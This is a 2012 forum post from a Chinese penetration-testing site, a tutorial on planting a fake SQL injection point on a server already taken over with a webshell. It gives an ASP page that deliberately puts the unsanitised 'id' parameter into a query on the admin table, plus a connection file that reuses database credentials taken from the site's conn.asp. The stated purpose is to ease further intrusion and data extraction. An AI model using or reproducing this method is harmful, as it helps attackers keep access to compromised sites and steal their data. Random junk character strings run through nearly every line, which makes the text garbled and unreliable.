中国网络渗透测试联盟

标题: 自己构造注入点方便入侵 [打印本页]

作者: admin    时间: 2012-9-13 17:27
标题: 自己构造注入点方便入侵
自己构造注入点方便入侵' F, d* q+ `) D/ o3 c

$ c# S( ]) O: O% X今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
* Y9 `, H% X6 C( u" G( t
! v: j2 n) Q3 X* Z这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!! G- O9 L1 G/ J. n, b4 O8 \/ _
3 {8 n% F7 o! l% o- h7 Y* a
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
& |% w; i4 e4 {( i# h, g2 N6 M, M+ _2 x; G4 ^* s/ N  Y1 h; b2 O2 L
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表/ V5 M" l/ ]* Q5 L" i. z
. k) X" T5 F) t: U
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
7 A$ N7 U! W& c4 t( v0 h; V' Y
1 u; V9 Z3 ]. u程序代码, @# j" ^/ u1 Y2 d* A, K' l
<!--#include file="xx.asp"-->
- k. E! L+ {7 \. W" u, b. f<%
+ K- O% E: H* ?: I; X/ t% S) s1 `( Fset rs=server.createobject("ADODB.recordset")
: d+ _0 B1 g5 h- p# I  ]6 B  o" u( Yid = request("id")0 E6 c  M  L4 h) R
strSQL = "select * from admin where id=" & id
. d- J: ~- v0 n2 t- t; \$ h% Yrs.open strSQL,conn,1,3* k5 h4 u9 ]- h
rs.close* p3 _8 j8 O$ k  u5 k
%>
( ^! W2 @5 P: N( @+ V% Y/ G$ L1 `2 d0 B
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
3 Z2 M  ~9 m: `
+ y, q/ e1 I/ d你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!% ~6 r& g, }! Z" {
9 u% `# q( G7 c$ z8 P& }1 e
然后就要构造一个连接数据库的文件了,代码如下:
( d# x  V0 N. c8 u2 ^) w, x程序代码* D+ {3 S% {, n% Y0 v3 G
<%        
+ c, O3 D7 ?1 e7 O2 L# \% kstrSQLServerName = "000.000.000.000"     '服务器名称或地址( B3 J  y7 o5 Q6 N. |# I9 p# X
strSQLDBUserName = "sqlname"         '数据库帐号
0 k2 b) I4 ~: e- y% q7 astrSQLDBPassword = "sqlpass"         '数据库密码2 Z; g- d& N9 [- z. [
strSQLDBName = "sqldataname"           '数据库名称
- y* y4 F9 h, W/ HSet conn = Server.CreateObject("ADODB.Connection")' m# o9 c6 A$ y1 f4 G* J
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
8 ~, _! h. x8 H- W4 w: sconn.open strCon
( ?" ~: }* [7 S%>
0 m; \, q6 F0 A$ b, W2 f/ B8 F/ V$ ^$ M7 T9 R! v" j2 ^7 H* ]
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
% u- [  E( j" h; k$ j9 F, ^! U9 H# u2 i' b) E  \% Z3 Q! A
就这样,正常情况下,就OK了,伪造成功……3 Y2 f7 x& o/ h. |* y. P% n
( {1 T- M/ Z; o! B
           如果有什么问题可以提出来大家一起探讨解决。




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2